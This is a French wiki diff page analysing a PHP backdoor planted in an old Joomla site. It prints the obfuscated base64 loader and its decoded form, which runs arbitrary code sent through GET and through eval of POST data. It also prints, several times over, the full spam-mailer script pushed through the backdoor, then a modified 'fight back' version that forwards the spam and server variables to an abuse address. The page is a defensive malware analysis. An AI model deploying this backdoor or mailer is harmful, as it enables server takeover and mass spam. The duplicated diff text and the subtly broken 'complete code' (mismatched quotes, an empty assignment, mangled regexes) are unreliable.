Analyse de l'exploitation d'une faille de sécurité s'appuyant sur en cryptage base64 : Différence entre versions

De e-glop
Ligne 17 : Ligne 17 :
 
=== Qu'est donc que ce code tordu ? ===
 
=== Qu'est donc que ce code tordu ? ===
  
La variable '''$___''' est la fonction '''base64_decode()''' décryptant la variable '''$__''', demandant elle-même le décryptage de la variable '''$_''' qui est la seule intéressante du fichier. Si nous regardons ce que '''$_''' a dans le ventre, voici son contenu une fois décrypté en base64 :
+
La variable '''$___''' est la fonction '''base64_decode()''' décryptant la variable '''$__''', demandant elle-même le décryptage de la variable '''$_POST['code']'''
 
 
  /**
 
  * @version 2.6
 
  *
 
  */
 
  if (isset($_POST["action"]))
 
  {
 
        switch ($_POST["action"])
 
        {
 
                case "test":
 
                        test();
 
                        break;
 
                case "regular_test":
 
                        regular_test();
 
                        break;
 
                case "mail":
 
                        send();
 
                        break;
 
                default:
 
                        break;
 
        }
 
        return;
 
  }
 
 
 
  if (count($_GET) > 0)
 
  {
 
        foreach ($_GET as $id => $code)
 
        {
 
                if ($id == "id")
 
                {
 
                        $code();
 
                }
 
        }
 
        return;
 
  }
 
 
 
  function test()
 
  {
 
        $encoded_data = "";
 
 
 
        $data["version"] = phpversion();
 
        if (isset($_SERVER["SERVER_SOFTWARE"]))
 
        {
 
                $data["serverapi"] = $_SERVER["SERVER_SOFTWARE"];
 
        }
 
        else
 
        {
 
                $data["serverapi"] = "Not Available";
 
        }
 
        ob_start();
 
        phpinfo(8);
 
        $data["modules"] = ob_get_contents();
 
        ob_clean();
 
        $data["ext_connect"] = fopen("http://www.ya.ru/", "r") ? TRUE : FALSE;
 
        $serializes_data = serialize($data);
 
        $encoded_data = base64_encode($serializes_data);
 
        echo $_POST["test_message"] . $encoded_data;
 
  }
 
 
 
  function regular_test()
 
  {
 
        $to = "air@example.com";
 
        $subj = "SUBJ!";
 
        $message = "EHLO";
 
        $res = mail($to,$subj,$message);
 
        if($res)
 
        {
 
            echo $_POST["test_message"];
 
        }
 
        else
 
        {
 
            echo strrev($_POST["test_message"]);
 
        }
 
  }
 
 
 
  function send()
 
  {
 
        $code = base64_decode($_POST["projectcode"]);
 
 
 
        eval($code);
 
        //return;
 
  }
 
 
 
  
 
== Analyse de ce qui se passe ==
 
== Analyse de ce qui se passe ==
 
=== Le code PHP du fichier ===
 
 
Autrement dit, ce code, qui est interprété par le moteur PHP, est capable de faire deux séries de tests et d'exécuter un code arbitraire envoyé en base64 via la variable '''projectcode''' envoyée en '''POST'''. Reste à savoir ce qui a bien pu être envoyé pour exécution...
 
  
 
=== Du code PHP envoyé en POST ===
 
=== Du code PHP envoyé en POST ===
  
Pour essayer de comprendre ce que le crackeur a derrière la tête, il faut donc le piéger et récupérer ce qu'il envoie en POST au fichier... Nous allons donc essayer de récupérer ces informations précieuses en réécrivant le fichier.
+
Pour essayer de comprendre ce que le crackeur a derrière la tête, il faut donc le piéger et récupérer ce qu'il envoie en POST au script PHP... Nous allons donc essayer de récupérer ces informations précieuses en réécrivant le fichier.
  
 
=== Piéger ce code ===
 
=== Piéger ce code ===
  
Nous y mettons le code PHP décrypté, sans oublier de rajouter en début de fichier la balise '''<?php''' de rigueur... Ajoutons maintenant au début du fichier un élément qui nous permettra de récupérer les variables POST :
+
Reprenons le fichier de départ, agrémenté au niveau de sa première ligne de :
  
 
   file_put_contents('/tmp/cracking_'.date('YmdHis').'.txt',print_r($_POST,true));
 
   file_put_contents('/tmp/cracking_'.date('YmdHis').'.txt',print_r($_POST,true));
 +
  die();
 +
 +
'''die();''' mettant définitivement fin aux malversations du script, nous récupérons les informations sans fournir aucun service en retour...
  
 
== Autopsie d'un code malveillant ==
 
== Autopsie d'un code malveillant ==
Ligne 122 : Ligne 38 :
 
=== 1ère étape, réception des données en POST ===
 
=== 1ère étape, réception des données en POST ===
  
Nous recevons en particulier la variable '''$_POST['code']''' qui ressemble à '''$_POST['projectcode']''' que nous cherchions :
+
Nous regardons en particulier la variable '''$_POST['code']''' alors que les autres sont essentiellement du contenu de spam (email "publicitaire" ou mailveillant) et des destinataires.
  
 
   if(!isset($_POST["emails"])
        OR !isset($_POST["themes"])
        OR !isset($_POST["messages"])
        OR !isset($_POST["froms"])
)
{
    exit();
}

if(get_magic_quotes_gpc())
{
    foreach($_POST as $key => $post)
    {
        $_POST[$key] = stripcslashes($post);
    }
}

$emails = @unserialize(base64_decode($_POST["emails"]));
$themes = @unserialize(base64_decode($_POST["themes"]));
$messages = @unserialize(base64_decode($_POST["messages"]));
$froms = @unserialize(base64_decode($_POST["froms"]));
$mailers = @unserialize(base64_decode($_POST["mailers"]));
$aliases = @unserialize(base64_decode($_POST["aliases"]));
$passes = @unserialize(base64_decode($_POST["passes"]));

if(isset($_SERVER))
{
    $_SERVER['REMOTE_ADDR'] = "127.0.0.1";
    if(!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
    {
        $_SERVER['HTTP_X_FORWARDED_FOR'] = "127.0.0.1";
    }
}

if(isset($_FILES))
{
    foreach($_FILES as $key => $file)
    {
        $filename = alter_macros($aliases[$key]);
        $filename = num_macros($filename);
        $filename = text_macros($filename);
        $filename = xnum_macros($filename);
        $_FILES[$key]["name"] = $filename;
    }
}

if(empty($emails))
{
    exit();
}

foreach ($emails as $fteil => $email)
{
    $theme = $themes[array_rand($themes)];
    $theme = alter_macros($theme["theme"]);
    $theme = num_macros($theme);
    $theme = text_macros($theme);
    $theme = xnum_macros($theme);

    $message = $messages[array_rand($messages)];
    $message = alter_macros($message["message"]);
    $message = num_macros($message);
    $message = text_macros($message);
    $message = xnum_macros($message);
    $message = pass_macros($message, $passes);
    $message = fteil_macros($message, $fteil);

    $from = $froms[array_rand($froms)];
    $from = alter_macros($from["from"]);
    $from = num_macros($from);
    $from = text_macros($from);
    $from = xnum_macros($from);

    $mailer = $mailers[array_rand($mailers)];
    
    send_mail($from, $email, $theme, $message, $mailer);
} 

function send_mail($from, $to, $subj, $text, $mailer)
{
    $un = strtoupper(uniqid(time()));

    $head = "From: $from\n";
    $head .= "X-Mailer: $mailer\n";
    $head .= "Reply-To: $from\n";

    $head .= "Mime-Version: 1.0\n";
    $head .= "Content-Type: multipart/alternative;";
    $head .= "boundary=\"----------".$un."\"\n\n";
    
    $plain = strip_tags($text);
    $zag = "------------".$un."\nContent-Type: text/plain; charset=\"ISO-8859-1\"; format=flowed\n";
    $zag .= "Content-Transfer-Encoding: 7bit\n\n".$plain."\n\n";
    
    $zag .= "------------".$un."\nContent-Type: text/html; charset=\"ISO-8859-1\";\n";
    $zag .= "Content-Transfer-Encoding: 7bit\n\n$text\n\n";
    $zag .= "------------".$un."--";
    
    if(count($_FILES) > 0)
    {
        foreach($_FILES as $file)
        {
            if(file_exists($file["tmp_name"]))
            {
                $f = fopen($file["tmp_name"], "rb");
                $zag .= "------------".$un."\n";
                $zag .= "Content-Type: application/octet-stream;";
                $zag .= "name=\"".$file["name"]."\"\n";
                $zag .= "Content-Transfer-Encoding:base64\n";
                $zag .= "Content-Disposition:attachment;";
                $zag .= "filename=\"".$file["name"]."\"\n\n";
                $zag .= chunk_split(base64_encode(fread($f, filesize($file["tmp_name"]))))."\n";
                fclose($f);
            }
        }
    }

    if(@mail($to, $subj, $zag, $head))
    {
        if(!empty($_POST['verbose']))
            echo "SENDED";
    }
    else
    {
        if(!empty($_POST['verbose']))
            echo "FAIL";
    }
    usleep(300);
}

function alter_macros($content)
{
    preg_match_all('#{(.*)}#Ui', $content, $matches);

    for($i = 0; $i < count($matches[1]); $i++)
    {

        $ns = explode("|", $matches[1][$i]);
        $c2 = count($ns);
        $rand = rand(0, ($c2 - 1));
        $content = str_replace("{".$matches[1][$i]."}", $ns[$rand], $content);
    }
    return $content;
}

function text_macros($content)
{
    preg_match_all('#\[TEXT\-([[:digit:]]+)\-([[:digit:]]+)\]#', $content, $matches);

    for($i = 0; $i < count($matches[0]); $i++)
    {
        $min = $matches[1][$i];
        $max = $matches[2][$i];
        $rand = rand($min, $max);
        $word = generate_word($rand);

        $content = preg_replace("/".preg_quote($matches[0][$i])."/", $word, $content, 1);
    }

    preg_match_all('#\[TEXT\-([[:digit:]]+)\]#', $content, $matches);

    for($i = 0; $i < count($matches[0]); $i++)
    {
        $count = $matches[1][$i];

        $word  = generate_word($count);

        $content = preg_replace("/".preg_quote($matches[0][$i])."/", $word, $content, 1);
    }


    return $content;
}

function xnum_macros($content)
{
    preg_match_all('#\[NUM\-([[:digit:]]+)\]#', $content, $matches);

    for($i = 0; $i < count($matches[0]); $i++)
    {
        $num = $matches[1][$i];
        $min = pow(10, $num - 1);
        $max = pow(10, $num) - 1;

        $rand = rand($min, $max);
        $content = str_replace($matches[0][$i], $rand, $content);
    }
    return $content;
}

function num_macros($content)
{
    preg_match_all('#\[RAND\-([[:digit:]]+)\-([[:digit:]]+)\]#', $content, $matches);

    for($i = 0; $i < count($matches[0]); $i++)
    {
        $min = $matches[1][$i];
        $max = $matches[2][$i];
        $rand = rand($min, $max);
        $content = str_replace($matches[0][$i], $rand, $content);
    }
    return $content;
}

function generate_word($length)
{
    $chars = 'abcdefghijklmnopqrstuvyxz';
    $numChars = strlen($chars);
    $string = '';
    for($i = 0; $i < $length; $i++)
    {
        $string .= substr($chars, rand(1, $numChars) - 1, 1);
    }
    return $string;
}

function pass_macros($content, $passes)
{
    $pass = array_pop($passes);
    
    return str_replace("[PASS]", $pass, $content);
}

function fteil_macros($content, $fteil)
{    
    return str_replace("[FTEIL]", $fteil, $content);
}

function from_host($content)
{
    if(empty($replace))
    {
        $replace = (!empty($_SERVER['SERVER_ADMIN'])) ? $_SERVER['SERVER_ADMIN'] : NULL;
        $pos = strpos($replace, "@");
        $replace = substr($replace, $pos);
    }
    
    $replace = (empty($replace) AND ! empty($_SERVER['SERVER_NAME'])) ? $_SERVER['SERVER_NAME'] : NULL;
    $replace = (empty($replace) AND ! empty($_SERVER['HTTP_HOST'])) ? $_SERVER['HTTP_HOST'] : NULL;
    
    $domains = @explode(".", $replace);
    if(!empty($domains))
    {
        $level1 = @array_pop($domains);
        $level2 = @array_pop($domains);
        $replace = $level2.".".$level1;
    }
    
    return str_replace("[FHOST]", $replace, $content);
}

 
   if(!isset($_POST["emails"])
        OR !isset($_POST["themes"])
        OR !isset($_POST["messages"])
        OR !isset($_POST["froms"])
)
{
    exit();
}

if(get_magic_quotes_gpc())
{
    foreach($_POST as $key => $post)
    {
        $_POST[$key] = stripcslashes($post);
    }
}

$emails = @unserialize(base64_decode($_POST["emails"]));
$themes = @unserialize(base64_decode($_POST["themes"]));
$messages = @unserialize(base64_decode($_POST["messages"]));
$froms = @unserialize(base64_decode($_POST["froms"]));
$mailers = @unserialize(base64_decode($_POST["mailers"]));
$aliases = @unserialize(base64_decode($_POST["aliases"]));
$passes = @unserialize(base64_decode($_POST["passes"]));

if(isset($_SERVER))
{
    $_SERVER['REMOTE_ADDR'] = "127.0.0.1";
    if(!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
    {
        $_SERVER['HTTP_X_FORWARDED_FOR'] = "127.0.0.1";
    }
}

if(isset($_FILES))
{
    foreach($_FILES as $key => $file)
    {
        $filename = alter_macros($aliases[$key]);
        $filename = num_macros($filename);
        $filename = text_macros($filename);
        $filename = xnum_macros($filename);
        $_FILES[$key]["name"] = $filename;
    }
}

if(empty($emails))
{
    exit();
}

foreach ($emails as $fteil => $email)
{
    $theme = $themes[array_rand($themes)];
    $theme = alter_macros($theme["theme"]);
    $theme = num_macros($theme);
    $theme = text_macros($theme);
    $theme = xnum_macros($theme);

    $message = $messages[array_rand($messages)];
    $message = alter_macros($message["message"]);
    $message = num_macros($message);
    $message = text_macros($message);
    $message = xnum_macros($message);
    $message = pass_macros($message, $passes);
    $message = fteil_macros($message, $fteil);

    $from = $froms[array_rand($froms)];
    $from = alter_macros($from["from"]);
    $from = num_macros($from);
    $from = text_macros($from);
    $from = xnum_macros($from);

    $mailer = $mailers[array_rand($mailers)];
    
    send_mail($from, $email, $theme, $message, $mailer);
} 

function send_mail($from, $to, $subj, $text, $mailer)
{
    $un = strtoupper(uniqid(time()));

    $head = "From: $from\n";
    $head .= "X-Mailer: $mailer\n";
    $head .= "Reply-To: $from\n";

    $head .= "Mime-Version: 1.0\n";
    $head .= "Content-Type: multipart/alternative;";
    $head .= "boundary=\"----------".$un."\"\n\n";
    
    $plain = strip_tags($text);
    $zag = "------------".$un."\nContent-Type: text/plain; charset=\"ISO-8859-1\"; format=flowed\n";
    $zag .= "Content-Transfer-Encoding: 7bit\n\n".$plain."\n\n";
    
    $zag .= "------------".$un."\nContent-Type: text/html; charset=\"ISO-8859-1\";\n";
    $zag .= "Content-Transfer-Encoding: 7bit\n\n$text\n\n";
    $zag .= "------------".$un."--";
    
    if(count($_FILES) > 0)
    {
        foreach($_FILES as $file)
        {
            if(file_exists($file["tmp_name"]))
            {
                $f = fopen($file["tmp_name"], "rb");
                $zag .= "------------".$un."\n";
                $zag .= "Content-Type: application/octet-stream;";
                $zag .= "name=\"".$file["name"]."\"\n";
                $zag .= "Content-Transfer-Encoding:base64\n";
                $zag .= "Content-Disposition:attachment;";
                $zag .= "filename=\"".$file["name"]."\"\n\n";
                $zag .= chunk_split(base64_encode(fread($f, filesize($file["tmp_name"]))))."\n";
                fclose($f);
            }
        }
    }

    if(@mail($to, $subj, $zag, $head))
    {
        if(!empty($_POST['verbose']))
            echo "SENDED";
    }
    else
    {
        if(!empty($_POST['verbose']))
            echo "FAIL";
    }
    usleep(300);
}

function alter_macros($content)
{
    preg_match_all('#{(.*)}#Ui', $content, $matches);

    for($i = 0; $i < count($matches[1]); $i++)
    {

        $ns = explode("|", $matches[1][$i]);
        $c2 = count($ns);
        $rand = rand(0, ($c2 - 1));
        $content = str_replace("{".$matches[1][$i]."}", $ns[$rand], $content);
    }
    return $content;
}

function text_macros($content)
{
    preg_match_all('#\[TEXT\-([[:digit:]]+)\-([[:digit:]]+)\]#', $content, $matches);

    for($i = 0; $i < count($matches[0]); $i++)
    {
        $min = $matches[1][$i];
        $max = $matches[2][$i];
        $rand = rand($min, $max);
        $word = generate_word($rand);

        $content = preg_replace("/".preg_quote($matches[0][$i])."/", $word, $content, 1);
    }

    preg_match_all('#\[TEXT\-([[:digit:]]+)\]#', $content, $matches);

    for($i = 0; $i < count($matches[0]); $i++)
    {
        $count = $matches[1][$i];

        $word  = generate_word($count);

        $content = preg_replace("/".preg_quote($matches[0][$i])."/", $word, $content, 1);
    }


    return $content;
}

function xnum_macros($content)
{
    preg_match_all('#\[NUM\-([[:digit:]]+)\]#', $content, $matches);

    for($i = 0; $i < count($matches[0]); $i++)
    {
        $num = $matches[1][$i];
        $min = pow(10, $num - 1);
        $max = pow(10, $num) - 1;

        $rand = rand($min, $max);
        $content = str_replace($matches[0][$i], $rand, $content);
    }
    return $content;
}

function num_macros($content)
{
    preg_match_all('#\[RAND\-([[:digit:]]+)\-([[:digit:]]+)\]#', $content, $matches);

    for($i = 0; $i < count($matches[0]); $i++)
    {
        $min = $matches[1][$i];
        $max = $matches[2][$i];
        $rand = rand($min, $max);
        $content = str_replace($matches[0][$i], $rand, $content);
    }
    return $content;
}

function generate_word($length)
{
    $chars = 'abcdefghijklmnopqrstuvyxz';
    $numChars = strlen($chars);
    $string = '';
    for($i = 0; $i < $length; $i++)
    {
        $string .= substr($chars, rand(1, $numChars) - 1, 1);
    }
    return $string;
}

function pass_macros($content, $passes)
{
    $pass = array_pop($passes);
    
    return str_replace("[PASS]", $pass, $content);
}

function fteil_macros($content, $fteil)
{    
    return str_replace("[FTEIL]", $fteil, $content);
}

function from_host($content)
{
    if(empty($replace))
    {
        $replace = (!empty($_SERVER['SERVER_ADMIN'])) ? $_SERVER['SERVER_ADMIN'] : NULL;
        $pos = strpos($replace, "@");
        $replace = substr($replace, $pos);
    }
    
    $replace = (empty($replace) AND ! empty($_SERVER['SERVER_NAME'])) ? $_SERVER['SERVER_NAME'] : NULL;
    $replace = (empty($replace) AND ! empty($_SERVER['HTTP_HOST'])) ? $_SERVER['HTTP_HOST'] : NULL;
    
    $domains = @explode(".", $replace);
    if(!empty($domains))
    {
        $level1 = @array_pop($domains);
        $level2 = @array_pop($domains);
        $replace = $level2.".".$level1;
    }
    
    return str_replace("[FHOST]", $replace, $content);
}

Ligne 379 : Ligne 295 :
 
   }
 
   }
  
Sur plusieurs envois, pour le moment ce code est toujours le même. Reste maintenant à savoir si ce code est interprété ou si c'est un leurre (nous cherchions '''projectcode''' et nous avons décrypté ici '''code'''), ainsi que de voir de plus près ce qu'il contient.
+
Sur plusieurs envois, pour le moment ce code est toujours le même. Considérons donc pour le moment que ce code est celui à analyser.
 +
 
 +
=== Étape 2, trouver à quel endroit les emails partent ===
 +
 
 +
C'est très simplement en utilisant la fonction '''mail()''' de PHP que le script envoie ses spams. Nous pouvons maintenant ellaborer une stratégie de riposte intelligente.
 +
 
 +
 
 +
=== Étape 3, modifier le comportement de ce script pour "fight back" ===
 +
 
 +
Nous allons donc prendre le code envoyé en '''POST''', décrypté bien entendu, et le modifier. Seul la partie où les courriels sont envoyés via la fonction '''mail()''' nous intéresse :
 +
 
 +
// dans la fonction send_mail()
 +
if(@mail($to, $subj, $zag, $head))
 +
 
 +
Modifions la variable '''$to''' pour y mettre le responsable "abuse" de la plage d'adresse IP utilisée par notre petit script-kiddy. Ici l'adresse IP est '''31.184.244.18''', et après un '''whois''' sur cette adresse il s'avère que l'adresse "abuse" est '''admin@toencompany.net'''.
 +
 
 +
''C'est parti'' !
 +
 
 +
== Concrêtement ==
 +
 
 +
=== Le code modifié ===
 +
 
 +
  // ...
 +
  // HACKING-THE-CRACKER ADDON
 +
  $subj = "SPAM/CRACK REPORT / Original subject: $subj / Original RCPT: $to";
 +
  $to = 'admin@toencompany.net';
 +
  $youremail = 'postmaster@YOURDOMAIN.TLD"
 +
  $zag = "CONTACT US FOR FURTHER EXPLANATION: $youremail\n\n\n\nORIGINAL SERVER VARS: ".print_r($_SERVER,true)."\n\n\n\n\nORIGINAL SPAMMING CONTENT:\n\n\n\n\n".$zag;
 +
 
 +
  if(@mail($to, $subj, $zag, $head))
 +
  // ...
 +
 
 +
NOTES:
 +
 
 +
* N'oubliez pas de remplacer '''postmaster@YOURDOMAIN.TLD''' par la bonne adresse email...
 +
* N'oubliez pas de remplacer '''admin@toencompany.net''' par l'adresse réelle du '''abuse''' responsable de l'adresse IP qui cherche à vous attaquer...
 +
 
 +
=== Le code au complet ===
 +
 
 +
if(!isset($_POST["emails"])
 +
      OR !isset($_POST["themes"])
 +
      OR !isset($_POST["messages"])
 +
      OR !isset($_POST["froms"])
 +
)
 +
{
 +
  exit();
 +
}
 +
 +
if(get_magic_quotes_gpc())
 +
{
 +
  foreach($_POST as $key => $post)
 +
  {
 +
      $_POST[$key] = stripcslashes($post);
 +
  }
 +
}
 +
 +
$emails = @unserialize(base64_decode($_POST["emails"]));
 +
$themes = @unserialize(base64_decode($_POST["themes"]));
 +
$messages = @unserialize(base64_decode($_POST["messages"]));
 +
$froms = @unserialize(base64_decode($_POST["froms"]));
 +
$mailers = @unserialize(base64_decode($_POST["mailers"]));
 +
$aliases = @unserialize(base64_decode($_POST["aliases"]));
 +
$passes = @unserialize(base64_decode($_POST["passes"]));
 +
 +
if(isset($_SERVER))
 +
{
 +
  $_SERVER['REMOTE_ADDR'] = "127.0.0.1";
 +
  if(!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
 +
  {
 +
      $_SERVER['HTTP_X_FORWARDED_FOR'] = "127.0.0.1";
 +
  }
 +
}
 +
 +
if(isset($_FILES))
 +
{
 +
  foreach($_FILES as $key => $file)
 +
  {
 +
      $filename = alter_macros($aliases[$key]);
 +
      $filename = num_macros($filename);
 +
      $filename = text_macros($filename);
 +
      $filename = xnum_macros($filename);
 +
      $_FILES[$key]["name"] = $filename;
 +
  }
 +
}
 +
 +
if(empty($emails))
 +
{
 +
  exit();
 +
}
 +
 +
foreach ($emails as $fteil => $email)
 +
{
 +
  $theme = $themes[array_rand($themes)];
 +
  $theme = alter_macros($theme["theme"]);
 +
  $theme = num_macros($theme);
 +
  $theme = text_macros($theme);
 +
  $theme = xnum_macros($theme);
 +
 +
  $message = $messages[array_rand($messages)];
 +
  $message = alter_macros($message["message"]);
 +
  $message = num_macros($message);
 +
  $message = text_macros($message);
 +
  $message = xnum_macros($message);
 +
  $message = pass_macros($message, $passes);
 +
  $message = fteil_macros($message, $fteil);
 +
 +
  $from = $froms[array_rand($froms)];
 +
  $from = alter_macros($from["from"]);
 +
  $from = num_macros($from);
 +
  $from = text_macros($from);
 +
  $from = xnum_macros($from);
 +
 +
  $mailer = $mailers[array_rand($mailers)];
 +
 
 +
  send_mail($from, $email, $theme, $message, $mailer);
 +
}
 +
 +
function send_mail($from, $to, $subj, $text, $mailer)
 +
{
 +
  $un = strtoupper(uniqid(time()));
 +
 +
  $head = "From: $from\n";
 +
  $head .= "X-Mailer: $mailer\n";
 +
  $head .= "Reply-To: $from\n";
 +
 +
  $head .= "Mime-Version: 1.0\n";
 +
  $head .= "Content-Type: multipart/alternative;";
 +
  $head .= "boundary=\"----------".$un."\"\n\n";
 +
 
 +
  $plain = strip_tags($text);
 +
  $zag = "------------".$un."\nContent-Type: text/plain; charset=\"ISO-8859-1\"; format=flowed\n";
 +
  $zag .= "Content-Transfer-Encoding: 7bit\n\n".$plain."\n\n";
 +
 
 +
  $zag .= "------------".$un."\nContent-Type: text/html; charset=\"ISO-8859-1\";\n";
 +
  $zag .= "Content-Transfer-Encoding: 7bit\n\n$text\n\n";
 +
  $zag .= "------------".$un."--";
 +
 
 +
  if(count($_FILES) > 0)
 +
  {
 +
      foreach($_FILES as $file)
 +
      {
 +
          if(file_exists($file["tmp_name"]))
 +
          {
 +
              $f = fopen($file["tmp_name"], "rb");
 +
              $zag .= "------------".$un."\n";
 +
              $zag .= "Content-Type: application/octet-stream;";
 +
              $zag .= "name=\"".$file["name"]."\"\n";
 +
              $zag .= "Content-Transfer-Encoding:base64\n";
 +
              $zag .= "Content-Disposition:attachment;";
 +
              $zag .= "filename=\"".$file["name"]."\"\n\n";
 +
              $zag .= chunk_split(base64_encode(fread($f, filesize($file["tmp_name"]))))."\n";
 +
              fclose($f);
 +
          }
 +
      }
 +
  }
 +
 
 +
  // HACKING-THE-CRACKER ADDON
 +
  $subj = "SPAM/CRACK REPORT / Original subject: $subj / Original RCPT: $to";
 +
  $to = 'admin@toencompany.net';
 +
  $youremail = 'postmaster@YOURDOMAIN.TLD"
 +
  $zag = "CONTACT US FOR FURTHER EXPLANATION: $youremail\n\n\n\nORIGINAL SERVER VARS: ".print_r($_SERVER,true)."\n\n\n\n\nORIGINAL SPAMMING CONTENT:\n\n\n\n\n".$zag;
 +
 
 +
  if(@mail($to, $subj, $zag, $head))
 +
  {
 +
      if(!empty($_POST['verbose']))
 +
          echo "SENDED";
 +
  }
 +
  else
 +
  {
 +
      if(!empty($_POST['verbose']))
 +
          echo "FAIL";
 +
  }
 +
  usleep(300);
 +
}
 +
 +
function alter_macros($content)
 +
{
 +
  preg_match_all('#{(.*)}#Ui', $content, $matches);
 +
 +
  for($i = 0; $i < count($matches[1]); $i++)
 +
  {
 +
 +
      $ns = explode("|", $matches[1][$i]);
 +
      $c2 = count($ns);
 +
      $rand = rand(0, ($c2 - 1));
 +
      $content = str_replace("{".$matches[1][$i]."}", $ns[$rand], $content);
 +
  }
 +
  return $content;
 +
}
 +
 +
function text_macros($content)
 +
{
 +
  preg_match_all('#\[TEXT\-(digit:+)\-(digit:+)\]#', $content, $matches);
 +
 +
  for($i = 0; $i < count($matches[0]); $i++)
 +
  {
 +
      $min = $matches[1][$i];
 +
      $max = $matches[2][$i];
 +
      $rand = rand($min, $max);
 +
      $word = generate_word($rand);
 +
 +
      $content = preg_replace("/".preg_quote($matches[0][$i])."/", $word, $content, 1);
 +
  }
 +
 +
  preg_match_all('#\[TEXT\-(digit:+)\]#', $content, $matches);
 +
 +
  for($i = 0; $i < count($matches[0]); $i++)
 +
  {
 +
      $count = $matches[1][$i];
 +
 +
      $word  = generate_word($count);
 +
 +
      $content = preg_replace("/".preg_quote($matches[0][$i])."/", $word, $content, 1);
 +
  }
 +
 +
 +
  return $content;
 +
}
 +
 +
function xnum_macros($content)
 +
{
 +
  preg_match_all('#\[NUM\-(digit:+)\]#', $content, $matches);
 +
 +
  for($i = 0; $i < count($matches[0]); $i++)
 +
  {
 +
      $num = $matches[1][$i];
 +
      $min = pow(10, $num - 1);
 +
      $max = pow(10, $num) - 1;
 +
 +
      $rand = rand($min, $max);
 +
      $content = str_replace($matches[0][$i], $rand, $content);
 +
  }
 +
  return $content;
 +
}
 +
 +
function num_macros($content)
 +
{
 +
  preg_match_all('#\[RAND\-(digit:+)\-(digit:+)\]#', $content, $matches);
 +
 +
  for($i = 0; $i < count($matches[0]); $i++)
 +
  {
 +
      $min = $matches[1][$i];
 +
      $max = $matches[2][$i];
 +
      $rand = rand($min, $max);
 +
      $content = str_replace($matches[0][$i], $rand, $content);
 +
  }
 +
  return $content;
 +
}
 +
 +
function generate_word($length)
 +
{
 +
  $chars = 'abcdefghijklmnopqrstuvyxz';
 +
  $numChars = strlen($chars);
 +
  $string = ;
 +
  for($i = 0; $i < $length; $i++)
 +
  {
 +
      $string .= substr($chars, rand(1, $numChars) - 1, 1);
 +
  }
 +
  return $string;
 +
}
 +
 +
function pass_macros($content, $passes)
 +
{
 +
  $pass = array_pop($passes);
 +
 
 +
  return str_replace("[PASS]", $pass, $content);
 +
}
 +
 +
function fteil_macros($content, $fteil)
 +
{   
 +
  return str_replace("[FTEIL]", $fteil, $content);
 +
}
 +
 +
function from_host($content)
 +
{
 +
  if(empty($replace))
 +
  {
 +
      $replace = (!empty($_SERVER['SERVER_ADMIN'])) ? $_SERVER['SERVER_ADMIN'] : NULL;
 +
      $pos = strpos($replace, "@");
 +
      $replace = substr($replace, $pos);
 +
  }
 +
 
 +
  $replace = (empty($replace) AND ! empty($_SERVER['SERVER_NAME'])) ? $_SERVER['SERVER_NAME'] : NULL;
 +
  $replace = (empty($replace) AND ! empty($_SERVER['HTTP_HOST'])) ? $_SERVER['HTTP_HOST'] : NULL;
 +
 
 +
  $domains = @explode(".", $replace);
 +
  if(!empty($domains))
 +
  {
 +
      $level1 = @array_pop($domains);
 +
      $level2 = @array_pop($domains);
 +
      $replace = $level2.".".$level1;
 +
  }
 +
 
 +
  return str_replace("[FHOST]", $replace, $content);
 +
}
 +
 
 +
 
 +
== ''The end'' ==
 +
 
 +
Il n'y a plus qu'à laisser faire.
  
=== Étape 2, voir si ce code est utilisé quelque part ===
+
Enjoy.
  
Ce code ne semble pour autant utilisé nulle part. De plus, c'est '''$_POST['projectcode']''' que nous attendions. Nous avons bien pensé à une vérification par exemple de la signature ''md5'' du fichier PHP exécuté pour éviter des fuites d'information aux anti-crackeurs, mais nous enregistrons toutes les données en '''POST''' dès avant toute vérification possible.
+
Remarques à envoyer à beta_AT_e-glop.net (_AT_ / @)
  
Nous laissons donc le filet ouvert afin de laisser le poisson se piéger dedans. Suite au prochain épisode.
 
  
 
== Ressources externes ==
 
== Ressources externes ==

Version du 24 avril 2013 à 19:18

Pré-compréhension

Sur un vieux Joomla! (de septembre 2009), on a retrouvé un fichier includes/.8jy4et.php installé là par le serveur web. Son nom et la façon dont il s'est retrouvé là ne laisse pratiquement de place à aucun doute : il s'agit d'un fichier "craquant" le système !

Reste à savoir comment il fonctionne...

Le fichier includes/.8jy4et.php

 <?php //176e622a9e272282a4a56a9100f5b75d
   $_=
   //ppZiAAS8dDJF9Q*(#_+@#TWyJ
   'Ci8qKgogKiBAdmVyc2lvbiAyLjYKICoKICovCmlmIChpc3NldCgkX1BPU1RbImFjdGlvbiJdKSkKewogICAgICAgIHN3aXRjaCAoJF9QT1NUWyJhY3Rpb24iXSkKICAgICAgICB7CiAgICAgICAgICAgICAgICBjYXNlICJ0ZXN0IjoKICAgICAgICAgICAgICAgICAgICAgICAgdGVzdCgpOwogICAgICAgICAgICAgICAgICAgICAgICBicmVhazsKICAgICAgICAgICAgICAgIGNhc2UgInJlZ3VsYXJfdGVzdCI6CiAgICAgICAgICAgICAgICAgICAgICAgIHJlZ3VsYXJfdGVzdCgpOwogICAgICAgICAgICAgICAgICAgICAgICBicmVhazsKICAgICAgICAgICAgICAgIGNhc2UgIm1haWwiOgogICAgICAgICAgICAgICAgICAgICAgICBzZW5kKCk7CiAgICAgICAgICAgICAgICAgICAgICAgIGJyZWFrOwogICAgICAgICAgICAgICAgZGVmYXVsdDoKICAgICAgICAgICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgfQogICAgICAgIHJldHVybjsKfQoKaWYgKGNvdW50KCRfR0VUKSA+IDApCnsKICAgICAgICBmb3JlYWNoICgkX0dFVCBhcyAkaWQgPT4gJGNvZGUpCiAgICAgICAgewogICAgICAgICAgICAgICAgaWYgKCRpZCA9PSAiaWQiKQogICAgICAgICAgICAgICAgewogICAgICAgICAgICAgICAgICAgICAgICAkY29kZSgpOwogICAgICAgICAgICAgICAgfQogICAgICAgIH0KICAgICAgICByZXR1cm47Cn0KCmZ1bmN0aW9uIHRlc3QoKQp7CiAgICAgICAgJGVuY29kZWRfZGF0YSA9ICIiOwoKICAgICAgICAkZGF0YVsidmVyc2lvbiJdID0gcGhwdmVyc2lvbigpOwogICAgICAgIGlmIChpc3NldCgkX1NFUlZFUlsiU0VSVkVSX1NPRlRXQVJFIl0pKQogICAgICAgIHsKICAgICAgICAgICAgICAgICRkYXRhWyJzZXJ2ZXJhcGkiXSA9ICRfU0VSVkVSWyJTRVJWRVJfU09GVFdBUkUiXTsKICAgICAgICB9CiAgICAgICAgZWxzZQogICAgIC